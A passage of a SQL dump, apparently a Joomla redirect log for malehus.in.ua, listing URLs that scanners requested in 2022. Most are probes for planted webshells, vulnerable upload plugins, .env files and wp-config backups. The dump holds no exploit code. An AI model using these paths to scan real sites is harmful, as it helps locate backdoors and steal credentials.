00:00:00',301),(37340,'https://malehus.in.ua/wp/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:37:57','0000-00-00 00:00:00',301),(37341,'https://malehus.in.ua/wp/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:37:58','0000-00-00 00:00:00',301),(37342,'https://malehus.in.ua/wp/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:38:00','0000-00-00 00:00:00',301),(37343,'https://malehus.in.ua/wp/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:38:02','0000-00-00 00:00:00',301),(37344,'https://malehus.in.ua/wp/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:38:04','0000-00-00 00:00:00',301),(37345,'https://malehus.in.ua/wp/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:38:05','0000-00-00 00:00:00',301),(37346,'https://malehus.in.ua/wp/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:38:06','0000-00-00 00:00:00',301),(37347,'https://malehus.in.ua/blog/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:38:07','0000-00-00 00:00:00',301),(37348,'https://malehus.in.ua/blog/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:38:08','0000-00-00 00:00:00',301),(37349,'https://malehus.in.ua/blog/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:38:10','0000-00-00 00:00:00',301),(37350,'https://malehus.in.ua/blog/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:38:12','0000-00-00 00:00:00',301),(37351,'https://malehus.in.ua/blog/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:38:13','0000-00-00 00:00:00',301),(37352,'https://malehus.in.ua/blog/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:38:14','0000-00-00 00:00:00',301),(37353,'https://malehus.in.ua/blog/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:38:14','0000-00-00 00:00:00',301),(37354,'https://malehus.in.ua/blog/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:38:16','0000-00-00 00:00:00',301),(37355,'https://malehus.in.ua/blog/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:38:18','0000-00-00 00:00:00',301),(37356,'https://malehus.in.ua/blog/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:38:20','0000-00-00 00:00:00',301),(37357,'https://malehus.in.ua/blog/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:38:21','0000-00-00 00:00:00',301),(37358,'https://malehus.in.ua/blog/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:38:22','0000-00-00 00:00:00',301),(37359,'https://malehus.in.ua/new/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:38:23','0000-00-00 00:00:00',301),(37360,'https://malehus.in.ua/new/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:38:24','0000-00-00 00:00:00',301),(37361,'https://malehus.in.ua/new/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:38:26','0000-00-00 00:00:00',301),(37362,'https://malehus.in.ua/new/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:38:28','0000-00-00 00:00:00',301),(37363,'https://malehus.in.ua/new/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:38:29','0000-00-00 00:00:00',301),(37364,'https://malehus.in.ua/new/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:38:29','0000-00-00 00:00:00',301),(37365,'https://malehus.in.ua/new/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:38:30','0000-00-00 00:00:00',301),(37366,'https://malehus.in.ua/new/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:38:32','0000-00-00 00:00:00',301),(37367,'https://malehus.in.ua/new/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:38:36','0000-00-00 00:00:00',301),(37368,'https://malehus.in.ua/new/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:38:38','0000-00-00 00:00:00',301),(37369,'https://malehus.in.ua/new/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:38:39','0000-00-00 00:00:00',301),(37370,'https://malehus.in.ua/new/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:38:40','0000-00-00 00:00:00',301),(37371,'https://malehus.in.ua/old/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:38:42','0000-00-00 00:00:00',301),(37372,'https://malehus.in.ua/old/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:38:44','0000-00-00 00:00:00',301),(37373,'https://malehus.in.ua/old/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:38:46','0000-00-00 00:00:00',301),(37374,'https://malehus.in.ua/old/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:38:49','0000-00-00 00:00:00',301),(37375,'https://malehus.in.ua/old/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:38:50','0000-00-00 00:00:00',301),(37376,'https://malehus.in.ua/old/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:38:50','0000-00-00 00:00:00',301),(37377,'https://malehus.in.ua/old/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:38:51','0000-00-00 00:00:00',301),(37378,'https://malehus.in.ua/old/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:38:53','0000-00-00 00:00:00',301),(37379,'https://malehus.in.ua/old/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:38:56','0000-00-00 00:00:00',301),(37380,'https://malehus.in.ua/old/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:38:58','0000-00-00 00:00:00',301),(37381,'https://malehus.in.ua/old/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:38:59','0000-00-00 00:00:00',301),(37382,'https://malehus.in.ua/old/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:39:00','0000-00-00 00:00:00',301),(37383,'https://malehus.in.ua/backup/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:39:01','0000-00-00 00:00:00',301),(37384,'https://malehus.in.ua/backup/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:39:03','0000-00-00 00:00:00',301),(37385,'https://malehus.in.ua/backup/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:39:05','0000-00-00 00:00:00',301),(37386,'https://malehus.in.ua/backup/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:39:08','0000-00-00 00:00:00',301),(37387,'https://malehus.in.ua/backup/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:39:09','0000-00-00 00:00:00',301),(37388,'https://malehus.in.ua/backup/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:39:10','0000-00-00 00:00:00',301),(37389,'https://malehus.in.ua/backup/alfa_data/alfacgiapi/perl.alfa',NULL,'','',2,0,'2022-04-22 04:39:11','0000-00-00 00:00:00',301),(37390,'https://malehus.in.ua/backup/alfa_data/alfacgiapi/bash.alfa',NULL,'','',2,0,'2022-04-22 04:39:13','0000-00-00 00:00:00',301),(37391,'https://malehus.in.ua/backup/alfa_data/alfacgiapi/py.alfa',NULL,'','',2,0,'2022-04-22 04:39:16','0000-00-00 00:00:00',301),(37392,'https://malehus.in.ua/backup/alfa_data/alfacgiapi/index.php',NULL,'','',1,0,'2022-04-22 04:39:17','0000-00-00 00:00:00',301),(37393,'https://malehus.in.ua/backup/alfa_data/alfacgiapi/radio.php',NULL,'','',1,0,'2022-04-22 04:39:18','0000-00-00 00:00:00',301),(37394,'https://malehus.in.ua/backup/alfa_data/alfacgiapi/404.php',NULL,'','',1,0,'2022-04-22 04:39:20','0000-00-00 00:00:00',301),(37395,'https://malehus.in.ua/ids.php',NULL,'','',1,0,'2022-04-22 04:39:23','0000-00-00 00:00:00',301),(37396,'https://malehus.in.ua/shell20211028.php',NULL,'','',3,0,'2022-04-22 04:39:30','0000-00-00 00:00:00',301),(37397,'https://malehus.in.ua/alfakun.php',NULL,'','',1,0,'2022-04-22 04:39:39','0000-00-00 00:00:00',301),(37398,'https://malehus.in.ua/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',2,0,'2022-04-22 04:39:45','0000-00-00 00:00:00',301),(37399,'https://malehus.in.ua/wp/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-04-22 04:39:46','0000-00-00 00:00:00',301),(37400,'https://malehus.in.ua/wordpress/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-04-22 04:39:47','0000-00-00 00:00:00',301),(37401,'https://malehus.in.ua/blog/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-04-22 04:39:48','0000-00-00 00:00:00',301),(37402,'https://malehus.in.ua/new/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-04-22 04:39:49','0000-00-00 00:00:00',301),(37403,'https://malehus.in.ua/test/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-04-22 04:39:50','0000-00-00 00:00:00',301),(37404,'https://malehus.in.ua/old/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-04-22 04:39:51','0000-00-00 00:00:00',301),(37405,'https://malehus.in.ua/backup/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-04-22 04:39:53','0000-00-00 00:00:00',301),(37406,'https://malehus.in.ua/admin/kcfinder/upload.php',NULL,'','',1,0,'2022-04-22 04:40:01','0000-00-00 00:00:00',301),(37407,'https://malehus.in.ua/js/kcfinder/upload.php',NULL,'','',1,0,'2022-04-22 04:40:02','0000-00-00 00:00:00',301),(37408,'https://malehus.in.ua/assets/admin/kcfinder/upload.php',NULL,'','',1,0,'2022-04-22 04:40:03','0000-00-00 00:00:00',301),(37409,'https://malehus.in.ua/kcfinder/upload.php',NULL,'','',1,0,'2022-04-22 04:40:04','0000-00-00 00:00:00',301),(37410,'https://malehus.in.ua/assets/js/kcfinder/upload.php',NULL,'','',1,0,'2022-04-22 04:40:05','0000-00-00 00:00:00',301),(37411,'https://malehus.in.ua/admin/assets/js/ckeditor/kcfinder/upload.php',NULL,'','',1,0,'2022-04-22 04:40:06','0000-00-00 00:00:00',301),(37412,'https://malehus.in.ua/ckeditor/plugins/kcfinder/upload.php',NULL,'','',1,0,'2022-04-22 04:40:08','0000-00-00 00:00:00',301),(37413,'https://malehus.in.ua/assets/admin/js/filemanager/dialog.php',NULL,'','',1,0,'2022-04-22 04:40:12','0000-00-00 00:00:00',301),(37414,'https://malehus.in.ua/assets/plugins/filemanager/dialog.php',NULL,'','',1,0,'2022-04-22 04:40:14','0000-00-00 00:00:00',301),(37415,'https://malehus.in.ua/assets/filemanager/dialog.php',NULL,'','',2,0,'2022-04-22 04:40:15','0000-00-00 00:00:00',301),(37416,'https://malehus.in.ua/admin/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2022-04-22 04:40:16','0000-00-00 00:00:00',301),(37417,'https://malehus.in.ua/wp-admin/install.php',NULL,'','',1,0,'2022-04-22 04:40:18','0000-00-00 00:00:00',301),(37418,'https://malehus.in.ua/wp/wp-admin/install.php',NULL,'','',1,0,'2022-04-22 04:40:19','0000-00-00 00:00:00',301),(37419,'https://malehus.in.ua/assets/admin/plugins/elfinder/connectors/php/connector.php',NULL,'','',1,0,'2022-04-23 07:16:54','0000-00-00 00:00:00',301),(37420,'https://malehus.in.ua/admin/elfinder/connectors/php/connector.php',NULL,'','',1,0,'2022-04-24 18:41:19','0000-00-00 00:00:00',301),(37421,'https://malehus.in.ua/local.php',NULL,'','',4,0,'2022-04-27 21:23:04','0000-00-00 00:00:00',301),(37422,'https://malehus.in.ua/anon.php',NULL,'','',1,0,'2022-04-27 21:23:04','0000-00-00 00:00:00',301),(37423,'https://malehus.in.ua/wp-2019.php',NULL,'','',3,0,'2022-04-27 21:23:05','0000-00-00 00:00:00',301),(37424,'https://malehus.in.ua/wp-system.php',NULL,'','',1,0,'2022-04-27 21:23:05','0000-00-00 00:00:00',301),(37425,'https://malehus.in.ua/auto-seo.php',NULL,'','',1,0,'2022-04-27 21:23:05','0000-00-00 00:00:00',301),(37426,'https://malehus.in.ua/ffaa531.php',NULL,'','',3,0,'2022-04-27 21:23:05','0000-00-00 00:00:00',301),(37427,'https://malehus.in.ua/https://malehus.in.ua/images/stories/el.jpg',NULL,'','',1,0,'2022-04-29 03:22:05','0000-00-00 00:00:00',301),(37428,'https://malehus.in.ua/mt/mt-xmlrpc.cgi',NULL,'','',2,0,'2022-04-30 15:00:48','0000-00-00 00:00:00',301),(37429,'https://malehus.in.ua/blog/mt/mt-xmlrpc.cgi',NULL,'','',1,0,'2022-04-30 15:00:48','0000-00-00 00:00:00',301),(37430,'https://malehus.in.ua/cgi/mt/mt-xmlrpc.cgi',NULL,'','',1,0,'2022-04-30 15:00:49','0000-00-00 00:00:00',301),(37431,'https://malehus.in.ua/api/public/.env',NULL,'','',1,0,'2022-05-01 10:18:30','0000-00-00 00:00:00',301),(37432,'https://malehus.in.ua/assets/js/elfinder/php/connector.php',NULL,'','',1,0,'2022-05-02 22:20:10','0000-00-00 00:00:00',301),(37433,'https://malehus.in.ua/admin/assets/plugins/elfinder/php/connector.php',NULL,'','',1,0,'2022-05-04 04:05:52','0000-00-00 00:00:00',301),(37434,'https://malehus.in.ua/plugins/elfinder/php/connector.php',NULL,'','',1,0,'2022-05-05 19:17:30','0000-00-00 00:00:00',301),(37435,'https://malehus.in.ua/radio.txt',NULL,'','',4,0,'2022-05-06 22:19:42','0000-00-00 00:00:00',301),(37436,'https://malehus.in.ua/assets/elfinder/php/connector.minimal.php',NULL,'','',1,0,'2022-05-07 17:07:12','0000-00-00 00:00:00',301),(37437,'https://malehus.in.ua/https://malehus.in.ua/images/stories/010.gif',NULL,'','',1,0,'2022-05-07 20:36:56','0000-00-00 00:00:00',301),(37438,'https://malehus.in.ua/assets/plugins/elfinder/php/connector.minimal.php',NULL,'','',1,0,'2022-05-09 05:22:41','0000-00-00 00:00:00',301),(37439,'https://malehus.in.ua/administrator/help/en-gb/start_here.html',NULL,'https://malehus.in.ua/administrator/index.php?option=com_admin&view=help','',4,0,'2022-05-09 06:33:29','0000-00-00 00:00:00',301),(37440,'https://malehus.in.ua/assets/elfinder/php/connector.php',NULL,'','',1,0,'2022-05-10 15:50:18','0000-00-00 00:00:00',301),(37441,'https://malehus.in.ua/oholoshennia/8-novini-2/2537-vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-11-misyatsiv-2021-roku',NULL,'','',2,0,'2022-05-10 19:54:35','0000-00-00 00:00:00',301),(37442,'https://malehus.in.ua/db/.env',NULL,'','',4,0,'2022-05-11 00:48:53','0000-00-00 00:00:00',301),(37443,'https://malehus.in.ua/opt/.env',NULL,'','',2,0,'2022-05-11 00:48:53','0000-00-00 00:00:00',301),(37444,'https://malehus.in.ua/plugins/elfinder/php/connector.minimal.php',NULL,'','',1,0,'2022-05-12 04:07:37','0000-00-00 00:00:00',301),(37445,'https://malehus.in.ua/assets/plugins/elfinder/php/connector.php',NULL,'','',1,0,'2022-05-13 14:22:16','0000-00-00 00:00:00',301),(37446,'https://malehus.in.ua/prod',NULL,'','',2,0,'2022-05-14 21:01:01','0000-00-00 00:00:00',301),(37447,'https://malehus.in.ua/wp-content',NULL,'','',1,0,'2022-05-14 21:01:03','0000-00-00 00:00:00',301),(37448,'https://malehus.in.ua/testing',NULL,'','',6,0,'2022-05-14 21:01:05','0000-00-00 00:00:00',301),(37449,'https://malehus.in.ua/wp-plain.php',NULL,'www.google.com','',9,0,'2022-05-15 04:35:07','0000-00-00 00:00:00',301),(37450,'https://malehus.in.ua/abyqqaip.php?fox=d3wl7',NULL,'www.google.com','',2,0,'2022-05-15 04:35:12','0000-00-00 00:00:00',301),(37451,'https://malehus.in.ua/admin/assets/elfinder/php/connector.php',NULL,'','',1,0,'2022-05-15 06:25:48','0000-00-00 00:00:00',301),(37452,'https://malehus.in.ua/env/.env',NULL,'','',4,0,'2022-05-16 07:18:45','0000-00-00 00:00:00',301),(37453,'https://malehus.in.ua/core',NULL,'','',1,0,'2022-05-18 02:17:02','0000-00-00 00:00:00',301),(37454,'https://malehus.in.ua/staging',NULL,'','',1,0,'2022-05-18 02:17:02','0000-00-00 00:00:00',301),(37455,'https://malehus.in.ua/wp-includes',NULL,'','',1,0,'2022-05-18 02:17:03','0000-00-00 00:00:00',301),(37456,'https://malehus.in.ua/indoxploit.php',NULL,'','',7,0,'2022-05-19 09:08:09','0000-00-00 00:00:00',301),(37457,'https://malehus.in.ua/img/',NULL,'','',1,0,'2022-05-19 09:08:24','0000-00-00 00:00:00',301),(37458,'https://malehus.in.ua/upload/',NULL,'','',1,0,'2022-05-19 09:08:27','0000-00-00 00:00:00',301),(37459,'https://malehus.in.ua/gallery/',NULL,'','',1,0,'2022-05-19 09:08:30','0000-00-00 00:00:00',301),(37460,'https://malehus.in.ua/pdf/',NULL,'','',1,0,'2022-05-19 09:08:35','0000-00-00 00:00:00',301),(37461,'https://malehus.in.ua/docs/',NULL,'','',1,0,'2022-05-19 09:08:38','0000-00-00 00:00:00',301),(37462,'https://malehus.in.ua/wp-includes/css/modules.php',NULL,'','',2,0,'2022-05-19 11:05:33','0000-00-00 00:00:00',301),(37463,'https://malehus.in.ua/wp-content/plugins/upspy/index.php',NULL,'','',2,0,'2022-05-19 11:05:49','0000-00-00 00:00:00',301),(37464,'https://malehus.in.ua/wp-content/plugins/ubh/index.php',NULL,'','',2,0,'2022-05-19 11:05:51','0000-00-00 00:00:00',301),(37465,'https://malehus.in.ua/wp-content/plugins/vwcleanerplugin/bump.php?cache',NULL,'','',2,0,'2022-05-19 11:05:54','0000-00-00 00:00:00',301),(37466,'https://malehus.in.ua/wp-content/plugins/xichang/x.php?xi',NULL,'','',2,0,'2022-05-19 11:05:57','0000-00-00 00:00:00',301),(37467,'https://malehus.in.ua/wp-content/plugins/html404/index.html',NULL,'','',2,0,'2022-05-19 11:06:01','0000-00-00 00:00:00',301),(37468,'https://malehus.in.ua/wp-admin/shapes.php',NULL,'','',2,0,'2022-05-19 11:06:05','0000-00-00 00:00:00',301),(37469,'https://malehus.in.ua/wp-content/uploads/',NULL,'','',2,0,'2022-05-19 11:06:33','0000-00-00 00:00:00',301),(37470,'https://malehus.in.ua/wp-content/uploads/2022/05/',NULL,'','',1,0,'2022-05-19 11:06:37','0000-00-00 00:00:00',301),(37471,'https://malehus.in.ua/wp-admin/network/wp-footer.php',NULL,'','',1,0,'2022-05-19 11:06:46','0000-00-00 00:00:00',301),(37472,'https://malehus.in.ua/wp-content/vuln.php',NULL,'','',1,0,'2022-05-19 11:06:57','0000-00-00 00:00:00',301),(37473,'https://malehus.in.ua/upel.php',NULL,'','',1,0,'2022-05-19 11:07:24','0000-00-00 00:00:00',301),(37474,'https://malehus.in.ua/wp-content/plugins/ppus/up.php',NULL,'','',1,0,'2022-05-19 11:07:26','0000-00-00 00:00:00',301),(37475,'https://malehus.in.ua/098.php',NULL,'','',1,0,'2022-05-19 11:07:29','0000-00-00 00:00:00',301),(37476,'https://malehus.in.ua/new_license.php',NULL,'','',1,0,'2022-05-19 11:07:35','0000-00-00 00:00:00',301),(37477,'https://malehus.in.ua/wp-content/plugins/theme-configurator/mini.php',NULL,'','',1,0,'2022-05-19 11:07:41','0000-00-00 00:00:00',301),(37478,'https://malehus.in.ua/wp-content/plugins/widget-logic/mini.php',NULL,'','',1,0,'2022-05-19 11:07:44','0000-00-00 00:00:00',301),(37479,'https://malehus.in.ua/modules/modules/modules.php',NULL,'','',2,0,'2022-05-19 12:46:33','0000-00-00 00:00:00',301),(37480,'https://malehus.in.ua/modules/mod_simplefileuploadv1.3/elements/clean.php',NULL,'','',2,0,'2022-05-19 12:46:39','0000-00-00 00:00:00',301),(37481,'https://malehus.in.ua/libraries/joomla/css.php',NULL,'','',2,0,'2022-05-19 12:46:43','0000-00-00 00:00:00',301),(37482,'https://malehus.in.ua/libraries/joomla/jmails.php?u',NULL,'','',2,0,'2022-05-19 12:46:45','0000-00-00 00:00:00',301),(37483,'https://malehus.in.ua/libraries/joomla/jmail.php?u',NULL,'','',2,0,'2022-05-19 12:46:47','0000-00-00 00:00:00',301),(37484,'https://malehus.in.ua/marvins.php',NULL,'','',3,0,'2022-05-19 12:46:55','0000-00-00 00:00:00',301),(37485,'https://malehus.in.ua/rxr.php?rxr',NULL,'','',1,0,'2022-05-19 12:47:00','0000-00-00 00:00:00',301),(37486,'https://malehus.in.ua/error.php',NULL,'','',11,0,'2022-05-19 12:47:12','0000-00-00 00:00:00',301),(37487,'https://malehus.in.ua/rxr.php',NULL,'','',3,0,'2022-05-19 12:47:16','0000-00-00 00:00:00',301),(37488,'https://malehus.in.ua/components/com_b2jcontact/izoc.php',NULL,'','',2,0,'2022-05-19 12:47:18','0000-00-00 00:00:00',301),(37489,'https://malehus.in.ua/templates/beez/index.php',NULL,'','',2,0,'2022-05-19 12:48:24','0000-00-00 00:00:00',301),(37490,'https://malehus.in.ua/templates/ja_purity/index.php',NULL,'','',2,0,'2022-05-19 12:48:28','0000-00-00 00:00:00',301),(37491,'https://malehus.in.ua/templates/rhuk_milkyway/index.php',NULL,'','',2,0,'2022-05-19 12:48:33','0000-00-00 00:00:00',301),(37492,'https://malehus.in.ua/templates/m/error.php',NULL,'','',2,0,'2022-05-19 12:48:36','0000-00-00 00:00:00',301),(37493,'https://malehus.in.ua/templates/beez3/error.php',NULL,'','',2,0,'2022-05-19 12:48:43','0000-00-00 00:00:00',301),(37494,'https://malehus.in.ua/templates/beez5/index.php',NULL,'','',10,0,'2022-05-19 12:48:47','0000-00-00 00:00:00',301),(37495,'https://malehus.in.ua/templates/beez5/error.php',NULL,'','',2,0,'2022-05-19 12:48:54','0000-00-00 00:00:00',301),(37496,'https://malehus.in.ua/templates/beez_20/index.php',NULL,'','',2,0,'2022-05-19 12:48:55','0000-00-00 00:00:00',301),(37497,'https://malehus.in.ua/templates/beez_20/error.php',NULL,'','',2,0,'2022-05-19 12:48:59','0000-00-00 00:00:00',301),(37498,'https://malehus.in.ua/templates/atomic/index.php',NULL,'','',2,0,'2022-05-19 12:49:04','0000-00-00 00:00:00',301),(37499,'https://malehus.in.ua/templates/atomic/error.php',NULL,'','',3,0,'2022-05-19 12:49:10','0000-00-00 00:00:00',301),(37500,'https://malehus.in.ua/assets/plugins/jqueryupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-19 18:22:47','0000-00-00 00:00:00',301),(37501,'https://malehus.in.ua/plugins/jqueryupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-21 16:49:27','0000-00-00 00:00:00',301),(37502,'https://malehus.in.ua/jqueryupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-23 08:15:53','0000-00-00 00:00:00',301),(37503,'https://malehus.in.ua/malehus',NULL,'www.google.com','',8,0,'2022-05-25 02:17:55','0000-00-00 00:00:00',301),(37504,'https://malehus.in.ua/shop',NULL,'www.google.com','',8,0,'2022-05-25 02:18:03','0000-00-00 00:00:00',301),(37505,'https://malehus.in.ua/store',NULL,'www.google.com','',8,0,'2022-05-25 02:18:07','0000-00-00 00:00:00',301),(37506,'https://malehus.in.ua/forum',NULL,'www.google.com','',8,0,'2022-05-25 02:18:16','0000-00-00 00:00:00',301),(37507,'https://malehus.in.ua/2017',NULL,'www.google.com','',4,0,'2022-05-25 02:19:55','0000-00-00 00:00:00',301),(37508,'https://malehus.in.ua/2016',NULL,'www.google.com','',4,0,'2022-05-25 02:19:58','0000-00-00 00:00:00',301),(37509,'https://malehus.in.ua/2015',NULL,'www.google.com','',4,0,'2022-05-25 02:20:03','0000-00-00 00:00:00',301),(37510,'https://malehus.in.ua/2014',NULL,'www.google.com','',4,0,'2022-05-25 02:20:08','0000-00-00 00:00:00',301),(37511,'https://malehus.in.ua/2013',NULL,'www.google.com','',4,0,'2022-05-25 02:20:12','0000-00-00 00:00:00',301),(37512,'https://malehus.in.ua/2012',NULL,'www.google.com','',4,0,'2022-05-25 02:20:22','0000-00-00 00:00:00',301),(37513,'https://malehus.in.ua/2010',NULL,'www.google.com','',4,0,'2022-05-25 02:20:25','0000-00-00 00:00:00',301),(37514,'https://malehus.in.ua/2009',NULL,'www.google.com','',4,0,'2022-05-25 02:20:29','0000-00-00 00:00:00',301),(37515,'https://malehus.in.ua/admin/jqueryupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-25 09:11:20','0000-00-00 00:00:00',301),(37516,'https://malehus.in.ua/assets/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-26 20:16:08','0000-00-00 00:00:00',301),(37517,'https://malehus.in.ua/public/assets/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-28 06:40:41','0000-00-00 00:00:00',301),(37518,'https://malehus.in.ua/wp-class.php',NULL,'www.google.com','',13,0,'2022-05-28 09:49:51','0000-00-00 00:00:00',301),(37519,'https://malehus.in.ua/wordpress/wp-class.php',NULL,'www.google.com','',1,0,'2022-05-28 09:50:12','0000-00-00 00:00:00',301),(37520,'https://malehus.in.ua/site/wp-class.php',NULL,'www.google.com','',1,0,'2022-05-28 09:50:38','0000-00-00 00:00:00',301),(37521,'https://malehus.in.ua/wp-content/index.php',NULL,'www.google.com','',1,0,'2022-05-28 09:51:06','0000-00-00 00:00:00',301),(37522,'https://malehus.in.ua/wp/wp-includes/wp-class.php',NULL,'www.google.com','',1,0,'2022-05-28 09:52:12','0000-00-00 00:00:00',301),(37523,'https://malehus.in.ua/wordpress/wp-includes/wp-class.php',NULL,'www.google.com','',1,0,'2022-05-28 09:52:38','0000-00-00 00:00:00',301),(37524,'https://malehus.in.ua/blog/wp-class.php',NULL,'www.google.com','',1,0,'2022-05-28 09:53:20','0000-00-00 00:00:00',301),(37525,'https://malehus.in.ua/admin/assets/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-29 16:27:28','0000-00-00 00:00:00',301),(37526,'https://malehus.in.ua/wp-config.inc',NULL,'','',2,0,'2022-05-31 02:55:18','0000-00-00 00:00:00',301),(37527,'https://malehus.in.ua/wp-config.old',NULL,'','',2,0,'2022-05-31 02:55:19','0000-00-00 00:00:00',301),(37528,'https://malehus.in.ua/wp-config.php.bak',NULL,'','',3,0,'2022-05-31 02:55:20','0000-00-00 00:00:00',301),(37529,'https://malehus.in.ua/wp-config.php.dist',NULL,'','',2,0,'2022-05-31 02:55:20','0000-00-00 00:00:00',301),(37530,'https://malehus.in.ua/wp-config.php.inc',NULL,'','',2,0,'2022-05-31 02:55:21','0000-00-00 00:00:00',301),(37531,'https://malehus.in.ua/wp-config.php.old',NULL,'','',3,0,'2022-05-31 02:55:21','0000-00-00 00:00:00',301),(37532,'https://malehus.in.ua/wp-config.php~',NULL,'','',2,0,'2022-05-31 02:55:22','0000-00-00 00:00:00',301),(37533,'https://malehus.in.ua/wp-config.php.txt',NULL,'','',2,0,'2022-05-31 02:55:23','0000-00-00 00:00:00',301),(37534,'https://malehus.in.ua/php.php',NULL,'','',2,0,'2022-05-31 02:55:25','0000-00-00 00:00:00',301),(37535,'https://malehus.in.ua/admin/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-31 03:37:21','0000-00-00 00:00:00',301),(37536,'https://malehus.in.ua/yeo.php',NULL,'','',1,0,'2022-05-31 11:50:44','0000-00-00 00:00:00',301),(37537,'https://malehus.in.ua/holuby/informatsiia-holubivnykam\'',NULL,'','',1,0,'2022-05-31 20:18:42','0000-00-00 00:00:00',301),(37538,'https://malehus.in.ua/\'',NULL,'','',1,0,'2022-05-31 20:47:19','0000-00-00 00:00:00',301),(37539,'https://malehus.in.ua/theme/assets/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-06-01 15:35:31','0000-00-00 00:00:00',301),(37540,'https://malehus.in.ua/.env.example',NULL,'','',5,0,'2022-06-01 18:49:34','0000-00-00 00:00:00',301),(37541,'https://malehus.in.ua/web/.env',NULL,'','',1,0,'2022-06-01 18:49:38','0000-00-00 00:00:00',301),(37542,'https://malehus.in.ua/website/.env',NULL,'','',1,0,'2022-06-01 18:49:40','0000-00-00 00:00:00',301),(37543,'https://malehus.in.ua/demo/.env',NULL,'','',1,0,'2022-06-01 18:49:41','0000-00-00 00:00:00',301),(37544,'https://malehus.in.ua/dev/.env',NULL,'','',1,0,'2022-06-01 18:49:43','0000-00-00 00:00:00',301),(37545,'https://malehus.in.ua/development/.env',NULL,'','',1,0,'2022-06-01 18:49:45','0000-00-00 00:00:00',301),(37546,'https://malehus.in.ua/newsite/.env',NULL,'','',1,0,'2022-06-01 18:49:53','0000-00-00 00:00:00',301),(37547,'https://malehus.in.ua/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-06-02 23:54:45','0000-00-00 